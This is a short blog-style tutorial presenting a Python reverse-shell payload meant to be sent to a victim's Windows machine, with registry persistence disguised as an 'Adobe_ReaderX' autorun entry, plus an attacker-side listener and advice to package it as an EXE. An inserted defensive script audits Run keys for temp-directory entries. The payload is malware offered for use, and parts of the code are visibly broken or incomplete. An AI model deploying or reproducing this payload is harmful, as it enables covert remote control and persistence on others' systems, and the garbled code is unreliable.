Reverse Shell tutorial

Hey Guys, Finlay Here
Today I present a reverse shell script I built during some boredom.
Proof that it works is here: View the Proof!

Here is the “” (which you send to the victim):

```python
# Please support me and my development by making a donation to:
# BTC: 1Gay22nGSs5tXArmABtSHGjKQTerMpptFV
import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy executable to %TEMP%:
    os.system('copy %s %s' % (fileName, tempdir))

    # Queries Windows registry for the autorun key value
    # Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            i += 1
    except WindowsError:
        pass

    # If the autorun key "Adobe ReaderX" isn't set this will set the key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
        except WindowsError:
            pass

def shell():
    # Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('', int(1998)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = +
        encoded = base64.b64encode(stdout_value)

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)

if __name__ == "__main__":
    main()
```

Please note that you need to change the IP and port to suit your scenario.
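As an added defensive counterpart (not part of the original post): the script above persists by writing a Run value that points into %TEMP%, so an administrator can enumerate the HKLM Run values and flag any entry that launches from a temp directory. The function names and the SAMPLE_ENTRIES list below are this example's own constructed assumptions; the live registry read uses Python 3's winreg module and is skipped on non-Windows hosts.

```python
"""Audit the HKLM Run key for autorun entries that launch from a temp directory."""
import re

# Run key path as used by the script on the page (HKLM hive).
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Unexpanded and expanded spellings of the usual temp directories.
TEMP_PATTERNS = [
    re.compile(r"%temp%", re.IGNORECASE),
    re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE),
    re.compile(r"\\Windows\\Temp\\", re.IGNORECASE),
]


def find_temp_autoruns(entries):
    """Return the (value_name, command) pairs whose command lives in a temp directory.

    entries: iterable of (value_name, value_data) tuples as stored under the Run key.
    """
    return [(name, cmd) for name, cmd in entries
            if any(p.search(cmd) for p in TEMP_PATTERNS)]


def read_run_key():
    """Read the live HKLM Run key on Windows; return [] where winreg is unavailable."""
    try:
        import winreg
    except ImportError:
        return []
    entries = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        i = 0
        while True:
            try:
                name, data, _kind = winreg.EnumValue(key, i)
            except OSError:          # raised once the value index runs past the end
                break
            entries.append((name, str(data)))
            i += 1
    return entries


# Constructed sample data modelled on the page's "Adobe_ReaderX" entry; not from a real host.
SAMPLE_ENTRIES = [
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("Adobe_ReaderX", r"%TEMP%\mw.exe"),   # product-like name, but launches from %TEMP%
    ("OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

if __name__ == "__main__":
    for name, cmd in find_temp_autoruns(read_run_key() or SAMPLE_ENTRIES):
        print("suspicious Run entry: %s -> %s" % (name, cmd))
```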
Also, here is the (which should be running on your box!):

```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 1998))
print "Listening on port 1998... "
(client, (ip, port)) = s.accept()
print " Received connection from : ", ip

while True:
    command = raw_input('~$ ')
    # XOR-obfuscate the command with 0x41 before it goes over the wire
    encode = bytearray(command)
    for i in range(len(encode)):
        encode[i] ^= 0x41
    # Reverse the same XOR on the reply
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i] ^= 0x41
    print decode
```


So these scripts are built fairly easily, and are probably not very effective.
But when you build them into an EXE (PyInstaller anyone?), send them to a Windows server, and boom, you’re a god now! (sorta…)

Please use these scripts for education only!
I’m not going to help you if you get in trouble!
